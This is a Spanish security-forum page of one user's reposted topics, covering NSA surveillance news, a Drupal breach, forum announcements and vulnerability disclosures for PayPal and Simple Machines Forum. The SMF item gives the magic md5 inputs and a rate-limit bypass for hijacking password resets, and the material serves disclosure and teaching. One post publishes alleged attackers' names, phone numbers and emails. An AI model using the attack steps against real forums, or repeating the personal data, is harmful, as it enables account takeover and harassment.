Mostrar Mensajes

Esta sección te permite ver todos los mensajes hechos por este usuario, recuerda que solo puedes ver los mensajes en áreas en donde tu tienes acceso.


Temas - WHK

Páginas: [1] 2 3 ... 9
1
El programa desarrollado por la inteligencia estadounidense puede recabar cualquier tipo de actividad y de cualquier persona en la red.

Un sistema de vigilancia secreto conocido como XKeyscore permite a la inteligencia de Estados Unidos supervisar "casi todo lo que un usuario típico hace en internet", según documentos publicados este miércoles por el diario británico The Guardian.

De acuerdo con documentos secretos suministrados por Edward Snowden, el exanalista de inteligencia estadounidense, The Guardian señala que el programa es el de mayor amplitud operado por la Agencia Nacional de Seguridad (NSA, por sus siglas en inglés) de EU.

El diario dijo que la existencia de XKeyscore corrobora la afirmación de Snowden, rechazada por funcionarios estadounidenses, de que la NSA podía hacer "cualquier escucha telefónica, a usted o a su contador, a un juez federal o incluso al presidente, si disponía de una dirección de correo electrónico personal".

En su página web, The Guardian publicó una serie de diapositivas de lo que parece ser un entrenamiento interno de inteligencia estadounidense, que muestra las capacidades del programa XKeyscore.

El periódico dijo que omitió cuatro de las 32 diapositivas debido a que "revelaban detalles específicos de operaciones de la NSA".

Las diapositivas están marcadas como "Top Secret" y su acceso está restringido a personal autorizado de Estados Unidos, Gran Bretaña, Canadá, Australia y Nueva Zelanda. Este material fue producido en 2007 y no debía ser desclasificado antes de 2032.

Según estas diapositivas, XKeyscore permite a Estados Unidos monitorear en tiempo real correos electrónicos, búsquedas en la web, sitios de internet, redes sociales y prácticamente cualquier actividad en la red de un usuario determinado.

El funcionamiento del sistema está garantizado por una infraestructura basada en un gran clúster de Linux con cerca de 500 servidores distribuidos alrededor del mundo.

Estos servidores estaban distribuidos tanto en países aliados como rivales de Washington, incluyendo Rusia, China y Venezuela.

A diferencia de otros sistemas de vigilancia, XKeyscore puede iniciar una vigilancia indexando virtualmente cualquier tipo de actividad en línea.

Entre los ejemplos suministrados se señala la capacidad del sistema para detectar acciones inusuales como que un usuario realice una búsqueda en una lengua poco utilizada en determinada región —por ejemplo en alemán desde Pakistán— o si alguien busca en Google Maps sitios considerados potenciales blancos para un ataque.

En estos casos el programa puede aislar los datos y realizar un seguimiento por su cuenta.

El documento señala que XKeyscore ha permitido a Estados Unidos capturar a "más de 300 terroristas".

Los gráficos revelados por The Guardian señalan que XKeyscore está siendo actualizado para hacerlo más potente y más rápido, así como ampliar el rango de datos que puede buscar, incluyendo información incrustrada dentro de fotos digitales.

Las nuevas revelaciones tienen lugar en momentos en que funcionarios de las tres agencias de inteligencia estadounidense y del Departamento de Justicia acudieron este miércoles a una audiencia en el Senado de Estados Unidos. La semana pasada, la Cámara de Representantes rechazó una propuesta para reducir fondos destinados a programas de espionaje.

Fuente: http://mexico.cnn.com/tecnologia/2013/08/01/xkeyscore-el-programa-con-el-que-eu-recolecta-informacion-de-internet

2
La Agencia de Seguridad Nacional (NSA) y el FBI también tendrían acceso a los registros de videos, fotografías y correos electrónicos de los ciudadanos de este país.

WASHINGTON.- Las agencias de inteligencia de Estados Unidos tienen acceso a los servidores de nueve gigantes de internet, como Microsoft, Yahoo!, Google y Facebook, en el marco de un programa confidencial de vigilancia de extranjeros, revelaron el jueves un diario estadounidense y otro británico.

El periódico estadounidense The Washington Post informó que la Agencia de Seguridad Nacional (NSA) y el FBI tienen acceso directo a los servidores de grandes grupos de internet, lo cual les permite rastrear la presencia web de un individuo a través de audio, video, fotografías, correos electrónicos y registros de conexión.

Algunas de las mayores empresas de Silicon Valley están involucrados en el programa, entre ellas Microsoft, Yahoo, Google, Facebook, Apple, PalTalk, AOL, Skype y YouTube, se informó. El periódico dio detalles de una reunión secreta sobre este programa - denominado PRISM - destinado a los analistas de la NSA en abril.

El programa fue creado en 2007 y ha crecido "exponencialmente", tanto que actualmente es uno de los componentes más prolíficos del Informe Diario al presidente Barack Obama.

Las revelaciones del Washington Post, también reportadas por el británico The Guardian, surgen en medio de un furor por el control de las comunicaciones telefónicas por parte del gobierno, lo cual reabrió el debate sobre los métodos de vigilancia adoptados por primera vez por el gobierno de George W. Bush luego de los atentados del 11 de septiembre de 2001.

Esto se conoce luego de que trascender que los servicios de inteligencia del gobierno de Obama vigilan millones de registros telefónicos de los estadounidenses, algo considerado "orwelliano" por grupos que defienden las libertades civiles.

Según The Guardian, el PRISM permitió a los expertos en inteligencia recabar información como el historial de búsqueda, correo electrónico, transferencia de archivos y chats en vivo. Aunque los documentos filtrados indicaron que las empresas implicadas sabían del tema, varias negaron tener conocimiento.

Google rechazó haber creado una "puerta trasera" en su sistema para permitir al gobierno acceder a los datos privados de los usuarios. Un ejecutivo de una empresa de tecnología, no identificado, citado por The Guardian, dijo: "Si ellos lo están haciendo, lo están haciendo sin nuestro conocimiento".

The Guardian informó que Microsoft había ingresado al programa en 2007, y Apple, en octubre de 2012, la incorporación más reciente.

El programa permitió a la NSA obtener comunicaciones sin necesidad de realizar solicitudes a los proveedores de servicios ni tener que obtener órdenes judiciales. The Guardian dijo que PRISM sirvió de fuente para más de 2.000 informes de inteligencia mensuales. Más de 24.000 informes fueron emitidos en 2012, un aumento de 27% desde 2011. Un total de 77.000 informes de inteligencia se basaron en el PRISM desde que el programa comenzó hace seis años, señaló The Guardian.

Fuentes:
http://www.emol.com/noticias/tecnologia/2013/06/07/602523/caso-de-espionaje-de-eeuu-involucra-servidores-de-google-facebook-entre-otros.html
http://www.elmundo.es/america/2013/06/07/estados_unidos/1370577062.html?a=93c0110d46ec09d9363cf72b06790d6e&t=1370596321&numero=
https://foro.elhacker.net/noticias/eeuu_espia_a_traves_de_los_servidores_de_apple_google_o_facebook-t391976.0.html

3
Robert Kugler, un alemán de 17 años, ha descubierto un grave fallo de seguridad en Paypal. La empresa, lejos de recompensar al estudiante a través de su programa oficial de caza de bugs, le "descalificó" después de haber reportado el fallo, que finalmente ha hecho público. No es el primer desliz de Paypal con respecto a los investigadores.

Robert Kugler ha descubierto un clásico problema de Cross Site Scripting en el buscador de Paypal. En una web de esta categoría, un XSS puede resultar extremadamente serio, puesto que permitiría a atacantes engañar a los usuarios de una manera mucho más sofisticada.
 
Kugler quiso acogerse al programa de recompensas de Paypal, que anima a la investigación responsable de vulnerabilidades premiando económicamente a los usuarios que encuentren fallos de seguridad. Así motivan un uso responsable de las vulnerabilidades. Mozilla, Google y otros agentes externos que funcionan como intermediarios, actúan de esta forma con éxito desde que se pusiera de moda hace unos años.
 
Kluger recibió sin embargo un email afirmando que su descubrimiento no optaba al premio por tener 17 años. Finalmente ha publicado el problema en Full Disclosure, quejándose de la situación. Kluger afirma que la respuesta de Paypal fue:
 
"To be eligible for the Bug Bounty Program, you must not: ... Be less than 18 years of age.If PayPal discovers that a researcher does not meet any of the criteria above, PayPal will remove that researcher from the Bug Bounty Program and disqualify them from receiving any bounty payments."
 
Pero parece que esto le fue comunicado en privado, puesto que públicamente no se pueden encontrar fácilmente esas restricciones en ninguna página oficial de Paypal ni parece que nunca se haya impuesto públicamente esta restricción.
 
El investigador en desventaja
 
Poner restricciones a la entregas de premios después de haber recibido la información es una práctica que, cuando menos, coloca al investigador en desventaja. No conoce las reglas del juego completas hasta que ha enseñado sus cartas (el código vulnerable) a la compañía. Esta, que ya puede arreglar el fallo (en última instancia, es lo que les interesa), decide entonces que los menores de edad no pueden recibir un premio.
 
Si se tratase de una cuestión legal, existen innumerables formas de sortear el inconveniente, como pedir permiso a sus tutores legales o compensar de otras formas. Pero la realidad es que se ha rechazado a la persona que encuentra un fallo que perfectamente encaja en la dinámica y reglas propuestas por Paypal, por una cuestión "menor" como es la edad... y esto deja en clara desventaja al usuario y da muy mala imagen a Paypal, que no es la primera vez que se ve criticada por otros aspirantes a la recompensa. Se han conocido otros problemas sufridos por investigadores para que la compañía realmente les pague por sus vulnerabilidades.
 
Otras empresas como Mozilla, llegaron a pagar 3.000 dólares a un chico de 12 años por encontrar un grave fallo de seguridad en el navegador. Cim Stordal, de 15 años, ha descubierto ya fallos en Facebook, Chrome... y en la mayoría de los programas ha sido aceptado y recompensado.
 
El investigador de seguridad informática es habitualmente joven, y la experiencia demuestra que suele elucubrar sus mejores ideas o potenciar sus habilidades durante su adolescencia. Imponer una restricción de edad como si la "inmadurez legal" fuese un obstáculo técnico en el mundo de la seguridad, no puede más que interpretarse como una excusa por parte de la compañía y una puesta en evidencia de un programa de recompensas que, si bien ha resultado una buena idea en general para todas las empresas que lo han puesto en marcha, Paypal en concreto parece gestionar de forma discutible. O al menos, no parece que le esté otorgando el rédito en buena imagen que, como efecto colateral, también se busca con estas iniciativas.

Más información:
 
La caza de bugs en Paypal acaba con la publicación de un grave agujero de seguridad http://unaaldia.hispasec.com/2012/11/la-caza-de-bugs-en-paypal-acaba-con-la.html
 
PayPal.com XSS Vulnerability http://seclists.org/fulldisclosure/2013/May/163
 
Boy bug hunter nabs $3,000 from Mozilla http://news.cnet.com/8301-17852_3-20020534-71.html
 
Teen finds bugs in Google, Facebook, Apple, Microsoft code http://news.cnet.com/8301-27080_3-57369971-245/teen-finds-bugs-in-google-facebook-apple-microsoft-code/

http://www.laflecha.net/canales/seguridad/noticias/paypal-no-paga-por-un-fallo-de-seguridad-descubierto-por-un-chico-de-17-anos

Fuente recursiva: https://foro.elhacker.net/noticias/paypal_no_paga_por_un_fallo_de_seguridad_descubierto_por_un_chico_de_17_anos-t391295.0.html

4
Hace pocos segundos me ha llegado un comunicado oficial por parte de Drupal comentando que sus servidores han sufrido un ataque de intrusión.

Se recomienda a los registrados en el portal a que actualicen sus credenciales de acceso y a los que utilizan el sistema a volver a descargarlo ya que no se sabe aun si hay descargas comprometidas con algún backdoor.

https://drupal.org/news/130529SecurityUpdate

Mensaje original:
Citar
Dear community member,

We respect the privacy of your information, which is why, as a precautionary measure, we are writing to let you know about an incident that involves your personal information. The Drupal.org Security and Infrastructure Teams have discovered unauthorized access to account information on Drupal.org and groups.drupal.org. Information exposed includes usernames, email addresses, and country information, as well as hashed passwords. However, we are still investigating the incident and may learn about other types of information compromised, in which case we will notify you accordingly.

This unauthorized access was made via third-party software installed on the Drupal.org server infrastructure, and was not the result of a vulnerability within the Drupal software itself. This notice applies specifically to user account data stored on Drupal.org and groups.drupal.org, and not to sites running Drupal generally.

We have implemented additional security measures designed to prevent the recurrence of such an attack, and to protect the privacy of our community members.

The next time you attempt to log into your account, you will be required to create a new password.

Below are steps you can take to further protect your personal information online. We encourage you to take preventative measures now to help prevent and detect the misuse of your information.

First, we recommend as a precaution that you change or reset passwords on other sites where you may use similar passwords, even though all passwords on Drupal.org are stored salted and hashed. All Drupal.org passwords are both hashed and salted, although some older passwords on groups.drupal.org were not salted. To make your password stronger:

* Do not use passwords that are simple words or phrases
* Never use the same password on multiple sites or services
* Use different types of characters in your password (uppercase letters, lowercase letters, numbers, and symbols).

Second, be cautious if you receive emails asking for your personal information and be on the lookout for unwanted spam. It is not our practice to request personal information by email. Also, beware of emails that threaten to close your account if you do not take the "immediate action" of providing personal information.

For more information, please review the security announcement and FAQ at https://drupal.org/news/130529SecurityUpdate. If you find any reason to believe that your information has been accessed by someone other than yourself, please contact the Drupal Association immediately, by sending an email to password@association.drupal.org.

We regret that this incident has occurred and want to assure you we are working hard to improve security.

Thank you,
Holly Ross
Drupal Association Executive Director

5
Como se darán cuenta he realizado muchisimos cambios en las secciones del foro, esto es para darle un mayor enfoque.

Actualmente WHK Security es un foro sobre Seguridad, principalmente fué de desarrollo WEB, luego de hacking pero me di cuenta que la rama del hacking es demasiado amplia.

Para comprender esto debemos entender que es el hacking, el hacker es una persona que lleva sus conocimientos al límite, independiente si es de informática o no.

En el mundo del hacking existe el hacktivismo, el hackeo a sistemas, esto no significa hacerlos reventar sino crear mejoras, modificaciones, etc, por ejemplo php hacks. También hay otra area específica que es la seguridad informática y sobre esto quiero dar el enfoque a este foro.

WHK Security es un foro dedicado a la seguridad informática (orientado al hacking).

Por ende los temas de programación quedaron en la categoría de programación, pienso que programar es algo necesario para comprender las vulnerabilidades de un sistema.

Todos los demás temas como por ejemplo "Como instalar joomla" fueron movidos hacia la sección de "categoría general", pero para que estos no se pierdan ni la sección pierda su calidad con contenido basura he eliminado la sección de "off topics", en otras palabras la categoría general sirve para hablar sobre temas de informática y no sobre como bajar a un gato del arbol, los temas fuera de contexto ya no están permitidos, de esta manera mantendremos un foro limpio de basura.

Si alguien hecha de menos los ultra offtopics con trolls y flammers pueden visitar otras comunidades que si los aceptan. Esto no quiere decir que no puedas hablar de nada, solo que la moderación será mas estricta, esto evitará que una persona que entre buscando sobre seguridad no vea temas sobre como hacer un pastel.

Esto hará que hayan menos temas pero de mayor calidad.

Las secciones aun no están listas, aun falta mover muchas cosas y renombrar otras, los textos descriptivos están muy largos y es un tema que debo mejorar.

El hacking no es lo mismo que Seguridad Informática asi que por favor no mezclen los temas, cada tema va en su categoría correspondiente.

Recuerden, esto ya no es un foro dedicado 100% a la programación, ahora es de seguridad informática.

Como muchos pueden ver hay un nuevo portal asociado al foro, en este portal pretendo poner algunas secciones relacionado con la seguridad informática, temas externos y locales.

Ya no habrá una ensalada de secciones, ya no es un foro 100% de hacking (comprendan esto, no es lo mismo que seguridad informática) a pesar de que la seguridad informática es una rama del hacking. Por lo tanto no hay noticias sobre el lanzamiento de un celular nuevo o sobre un nuevo lenguaje de programación, desde hoy en la sección de noticias solo habrán noticias relacionadas con la seguridad informática y alguno que otro tema de hacking general.

Tampoco habrá sección de telefonía móvil, pero si de seguridad móvil, no hay sección de Windows, Linux, etc pero si de seguridad informática sobre Windows, etc.

Esto quiere decir que ya no habrán mas temas por ejemplo sobre como detener un servicio en windows, pero si habran temas que digan por ejemplo que una dll de windows es propenso a un desbordamiento de memoria o sobre un exploit para office.

Tampoco habrá una sección de descarga de peliculas, música, sección de diseño, juegos, etc. Talves algún dia se hable sobre como evadir cosas de seguridad en los juegos pero sobre el lanzamiento de un nuevo juego no.

Todas las sugerencias son válidas, si alguien tiene algo que decir al respecto puede hacerlo respondiendo a este mismo post.

Saludos y Enjoy.



6
Entre los contratistas de defensa, la empresa QinetiQ North America es conocida por sus conexiones en el mundo del espionaje y su asombrosa línea de productos. Sus aportaciones a la seguridad nacional incluyen satélites secretos, aviones no tripulados y software que emplean las fuerzas especiales de Estados Unidos en Afganistán y Oriente Próximo.

Sin embargo, la experiencia de esta veterana empresa de espionaje no pudo impedir que los ciberespías chinos la engañaran. Durante tres años, unos piratas informáticos vinculados al ejército chino se infiltraron en los ordenadores de QinetiQ y pusieron en peligro la mayor parte de su labor investigadora, por no decir toda. En un momento dado, se introdujeron en la red interna de la compañía aprovechando un fallo de seguridad que se había descubierto meses antes y nunca se había reparado.

Ahora que la Casa Blanca se dispone a pedir cuentas a China por la tecnología estadounidense que ha robado gracias a la piratería informática, las autoridades necesitan saber todavía cuánto daño está ya hecho. Durante sus años de ataques contra los contratistas de defensa, los espías robaron varios terabytes –es decir, cientos de millones de páginas– de documentos y datos sobre programas de armamento, un volumen que deja pequeño cualquier robo de secretos durante la Guerra Fría. Los piratas de QinetiQ quizá pusieron en peligro informaciones vitales para la seguridad nacional, como el despliegue y las capacidades de la flota de helicópteros de combate.

Fuente: http://hispabyte.net/2013/05/ciberespias-chinos-logran-sortear-a-ee-uu-y-robar-secretos-militares-vitales/

7
Boletines y comunicados del foro / Volvemos como el ave fenix!
« : mayo 17, 2013, 12:56:51 pm »
Hemos vuelto nuevamente  :hhm:

Después de haber recibido un ataque DDOS y movernos de servidor surgimos de las cenizas para ofrecer mas excelente contenido y un mejor soporte mas profesional.  :yum:

Gracias a todos los que siguen entrando, habrán muchos cambios incluyendo en el diseño, nuevas secciones, un nuevo portal, todo mas organizado y limpio (los temas no se perderán).

Re-Bienvenidos todos!

8
Boletines y comunicados del foro / Ataque al foro
« : mayo 02, 2013, 11:17:13 am »
Ayer se detectó un ataque hacia al foro que nos dejó fuera de linea por un un par de horas ya que esto fué en horas de la madrugada y no tenía conocimiento de esto hasta que Octalh me contactó por correo y entre ambos solucionamos este problema.

Estubimos observando el log de accesos del servidor y pudimos darnos cuenta de donde provenian los ataques y sus ips correspondientes.

El ataque básico fué realizado por un tipo que junta visitantes de un chat y los redirecciona hacia un html con muchos iframes:
http://flowflash.webs.com/CL/

Lejos de ser un hacker lo unico que logró fue que tomasemos mas precauciones para que esto no volviera a suceder.

Si mas que decir les presento el super sitio WEB creado por un dominicano que aparentemente se lo hizo su hijo de 10 años:
http://flowflash.webs.com/

Acá los contactos de estas personas que son dueños del sitio WEB:

Señoras y señores... los lammers de Republica Dominicana...

Citar
TECNICO EN COMPUTADORA Y REPARADORES DE SISTEMA OPERATIVO REP. DOM. MAS INFOMACION EN
ADMIN: VICTOR LUIS TORRES CEL. 809-235-6890
JOHSWA SERGIO CABRERA ABREU CEL. 809-451-1537

flowfactori@hotmail.com
la-sombra2010@hotmail.com

Republica Dominicana






Ahi estan sus teléfonos y correos.

Es raro ver como hay gente que promociona la instalación de Windows UE siendo un software ilegal.

A parte de tomar las medidas necesarias a nivel de programación también hemos hecho las respectivas denuncias a webs.com y la policía de investigaciones de delitos informáticos de ese Pais entregandoles sus numeros telefónicos y sus nombres completos.

En este momento estan atacando a otro foro, pero ya me puse en contacto con el administrador para realizar una demanda colectiva y ayudarle con un pequeño código para prevenir este ataque tan basico.

Todos los ataques restantes fueron redirigidos a un sitio WEB especialmente diseñado para detener este ataque, los análisis arrojaron que fueron detenidos casi 4 mil hits:

Código: [Seleccionar]
Top 6 of 6 Total Referrers
#    Hits    Referrer
1    3668    89.84%    http://flowflash.webs.com/CL/index.htm
2    285    6.98%    http://flowflash.webs.com/CL/
3    81    1.98%    - (Direct Request)

¿Porqué nuestro sforo se cayó ante un ataque como este?
Porque estamos alojados en un servidor compartido de Hostgator y entre muchas cosas una de estas restricciones produjo que el sistema debegara el servicio.

Por el momento no tenemos control sobre el servidor ya que no nos pertenece y por ende no podemos tomar medidas a nivel de servicio como firewalls o ids, pero hacemos lo posible para mantener la integridad del servicio a traves de una buena programación.

Saludos.

9
Cito directamente desde la invitación que me ha llegado por si a algún Mexicano le interesa :)


Los invitamos a tomar el Diplomado, iniciamos Abril 6 el otro grupo, Ya tenemos sede para el Diplomado, En Innovatia en la colonia Condesa, Tlaxcala esquina con Nuevo Leon esta a lado el metrobús Nuevo León y a tres cuadras de Insurgentes y del metro Chilpancingo

El modulo 1 consta de los siguientes talleres practicos
Citar
Virtualizacion Cloud para prevencion de DDoS   
 Ataques Man in the Middle (Modificacion de cabezeras, sniffeo de redes, ARP Poisoning)
 Anonimato en la red
 Analisis Forense
 Hardening de un servidor centOS
 DoS Deflate + apf + mysql
 Google Hacking
 SQL Injection a fondo y metodos para protegerse
 Raspberry PI Pentesting
 SET (Social Engineering Toolkit)
 Auditoria Wireless


El modulo 1 esta constituido de 25 horas de practica presencial con profesores altamente capacitados, ademas recibira el material didactico para maximizar el aprendizaje que consta de lo siguiente: DVD con Videos y Herramientas de Hacking
Citar
1 Revista Impresa de HackingMexico
 1 Entrada VIP al congreso


Mas información http://www.hackingmexico.mx/coisp/
Invitacion de Facebook http://www.facebook.com/events/534706776549934

10
Paypal no es un sistema inhackeable, de hecho las noticias sobre fallas reparadas son casi semanales y en mas de algún momento hemos leido la cantidad de veces que han sustraido cuentas ilegalmente.

Esta no es la exepción y cito desde la fuente real con esta nueva reparación:


Title:
 ======
 Paypal Bug Bounty #20 - Persistent Web Vulnerabilities
 
 
 Date:
 =====
 2013-01-25
 
 
 References:
 ===========
 http://www.vulnerability-lab.com/get_content.php?id=682
 
 PayPal UID: fxv444khi
 
 
 VL-ID:
 =====
 682
 
 
 Common Vulnerability Scoring System:
 ====================================
 3.5
 
 
 Introduction:
 =============
 PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money
 transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally,
 a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some
 time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined
 spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified
 funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy
 (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your
 PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a
 PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary
 funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards.
 The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request
 a transfer to their bank account.
 
 PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it
 charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency
 used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account
 type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.
 
 On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United
 States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale,
 Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across
 Europe, PayPal also operates as a Luxembourg-based bank.
 
 On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers
 to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010.
 Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation
 for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.
 
 (Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]
 
 
 Abstract:
 =========
 The Vulnerability Laboratory Research Team discovered a Web Vulnerability in Paypal Labs Fundraising Widget Web Application.
 
 
 Report-Timeline:
 ================
 2012-08-13:     Researcher Notification & Coordination
 2012-08-14:     Vendor Notification
 2012-09-13:     Vendor Response/Feedback
 2013-01-12:     Vendor Fix/Patch (PayPal Inc)
 2013-01-25:     Public Disclosure
 
 
 Status:
 ========
 Published
 
 
 Exploitation-Technique:
 =======================
 Remote
 
 
 Severity:
 =========
 Medium
 
 
 Details:
 ========
 Multiple persistent input validation vulnerabilities are detected in Paypal Labs Fundraising Widget. The bugs allow remote attackers
 to implement/inject malicious script code on the application side (persistent).
 
 The persistent vulnerabilities are located in the Generate Widgets module with the bound vulnerable your name, your website,
 image url and supporters parameter listing. Attackers can inject own malicious script code as name, website url, image url or as
 supporter link to generate evil fundraising widgets. The execution of the script code occurs in the main listing out of the account
 index or the generated widget file output listing.
 
 Exploitation requires low user interaction or low privileged application user account. Successful exploitation of the vulnerability leads
 to persistent session hijacking (admin/mod/customer), account steal via persistent web attack or stable (persistent) context manipulation.
 
 Vulnerable Service(s):
                           [ ] Fundraising Widgets [https://giving.paypallabs.com/]
 
 Vulnerable Module(s):
                           [ ] Generate Widgets
 
 Vulnerable Parameter(s):
                           [ ] your name
                           [ ] your website
                           [ ] image url
                           [ ] supporters
 
 Affected Section(s):
                           [ ] Giving PaypalLabs Account Index
                           [ ] Generated widget output file
 
 
 Proof of Concept:
 =================
 The persistent web vulnerabilities can be exploited by remote attackers with low privileged application user account and with low or medium
 required user inter action. For demonstration or reproduce ...
 
 Session:        https://giving.paypallabs.com/authenticate/myaccount?token=HA-CYR26UHWRK8CS
 Time:           17:58 - 18:10 (EU) 2012-08-13
 
 
 Review: Your giving widgets - Account Index
 
 <tr>
 <td height="20" width="20"><img src="myaccount-Dateien/spacer.gif" height="1" width="20"></td>
 <td align="left" height="20" valign="top" width="10"><img src="myaccount-Dateien/dot.gif" height="7" width="2"></td>
 <td class="gap" title="-1' " align="left" height="20" width="110"><[PERSISTENT INJECTED SCRIPT CODE!]")' <"=""><a
 href="/authenticate/view_campaign?campaign=38284">-1'
 "><[PERSISTENT INJECTED SCRIPT CODE!]") <</a></td>
 <td width="20" height="20"><img
 src="/images/spacer.gif" width="20" height="1" /></td>
 </tr>
 
 
 Review: Review Badge - Link
 
 <a name='b_60df8340c78b012fbb8a000d60d4c902'></a><object type='application/x-shockwave-flash' data='https://giving.paypallabs.com/flash/badge.swf'
 width='205' height='350' id='badge60df8340c78b012fbb8a000d60d4c902' align='middle'>
 <param name='allowScriptAccess' value='always' />
 <param name='allowNetworking' value='all' />
 <param name='movie' value='https://giving.paypallabs.com/flash/badge.swf' />
 <param name='quality' value='high' />
 <param name='bgcolor' value='#FFFFFF' />
 <param name='wmode' value='transparent' />
 <param name='FlashVars' value='Id=60df8340c78b012fbb8a000d60d4c902'/>
 <embed src='https://giving.paypallabs.com/flash/badge.swf' FlashVars='Id=60df8340c78b012fbb8a000d60d4c902'
 quality='high' bgcolor='#FFFFFF' wmode='transparent' width='205' height='350' Id='badge60df8340c78b012fbb8a000d60d4c902' align='middle'
 allowScriptAccess='always' allowNetworking='all' type='application/x-shockwave-flash' pluginspage='http://www.macromedia.com/go/getflashplayer'></embed>
 </object>
 
 
 Risk:
 =====
 The security risk of the persistent script code inject vulnerability is estimated as medium( ).
 
 
 Credits:
 ========
 Vulnerability Laboratory [Research Team]  -    Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
 
 
 
 Disclaimer:
 ===========
 The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
 either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
 Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
 profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
 states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
 may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
 or trade with fraud/stolen material.
 
 Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                             - www.vulnerability-lab.com/register
 Contact:    admin@vulnerability-lab.com         - support@vulnerability-lab.com                - research@vulnerability-lab.com
 Section:    video.vulnerability-lab.com         - forum.vulnerability-lab.com                  - news.vulnerability-lab.com
 Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                - youtube.com/user/vulnerability0lab
 Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php
 
 Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
 Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
 media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
 other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
 modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
 
Fuente: http://seclists.org/fulldisclosure/2013/Feb/15

11
Hace muuuucho tiempo se habia mensionado de esta vulnerabilidad pero a pesar de que el staff de simplemachines nunca le habia tomado atención recien hace pocas horas despues de que el descubridor hizo un post en su blog publicando esta falla actualizaron a las versiones 1.1.18 y 2.0.4

Cito de la fuenre original:


 Simple Machines Forum is a popular web community software written in PHP. Its password reset mechanism had some issues back in 2008. The vulnerability was caused by insecure random numbers generation and was patched right after the exploit was published. This time I found a more interesting vulnerability however at Positive Technologies we didn’t manage to raise awareness of SMF developers. After continuous silence of SMF devs I am disclosing the vulnerability details but I am not going to publish the exploit.

The new vulnerability in password reset algo persists in SMF since the early versions and derives from insecure string handling and PHP weird type casting. The attack scenario based on incorrect string comparison was first described by Omar Ganiev and was applied to phpBB forum.

Despite the fact that the actual phpBB code made it infeasible to conduct the attack the core idea is rather interesting. Imagine a web application that generates password reset token that contains only hex symbols (a-f, 0-9) and is rather short. Now let me remind you about PHP type juggling pecularities.

If you use == operator to compare strings that contain numbers they will automatically be casted to integers, for example a string «123″ will be equal to an integer 123. But what is more interesting is the following abstract from PHP documentation on type juggling:

Citar
The value is given by the initial portion of the string. If the string starts with valid numeric data, this will be the value used. Otherwise, the value will be 0 (zero). Valid numeric data is an optional sign, followed by one or more digits (optionally containing a decimal point), followed by an optional exponent. The exponent is an ‘e’ or ‘E’ followed by one or more digits.


It means that if you compare a string «0e1337″ with a string «0″ they will be equal, because 0 power 1337 is zero. Not so many web developers are aware of this kind of unexpected magic, however it leads to a potential security hole. If an attacker starts to send password reset requests and iteratively tries to match it «0″ or «1″, one lucky request will let him set admin password.

So, what about SMF? It is an ideal example of one insecure piece of PHP code. Just see this:
Código: php [Seleccionar]
if (empty($_POST['code']) || substr($realCode, 0, 10) != substr(md5($_POST['code']), 0, 10))


Lack of !==, only 10 symbols and hex format. Excellent! As you can see $_POST['code'] is md5′d, so we need to find such values that will give us 0e[num] or 1e[num]. These values are:

Código: [Seleccionar]
md5(5136) == [0e79548081]b4bd0df3c77c5ba2c23289
md5(8301) == [1e79596878]b2320cac26dd792a6c51c9

However newer versions of SMF has a limitation of password reset rate to prevent bruteforce:

Código: php [Seleccionar]
if (empty($number_tries) || $time_stamp < (time() - 10))
{
    // If it wasn't *that* long ago, don't give them another five goes.
    $number_tries = !empty($number_tries) && $time_stamp < (time() - 20) ? 2 : 0;
    $time_stamp = time();
}


There is another bug. If an attacker sends a password reset request within 10-20 second interval the $number_tries will be set to 0 instead of 2. Obviously this was not SMF devs intention.

The successful attack requires about 6-10 k requests and can be done in a night. The older versions of SMF do not have this limitation, so you will be able to set new password in few hours.

Fuente: http://raz0r.name/vulnerabilities/simple-machines-forum/

12
Hace poco se encontraron multiples fallas de seguridad en el theme "Flash News theme" para Wordpress que permitiria a un atacante tomar el control total del sitio.

Cito de la fuente original:


Hello list!
 
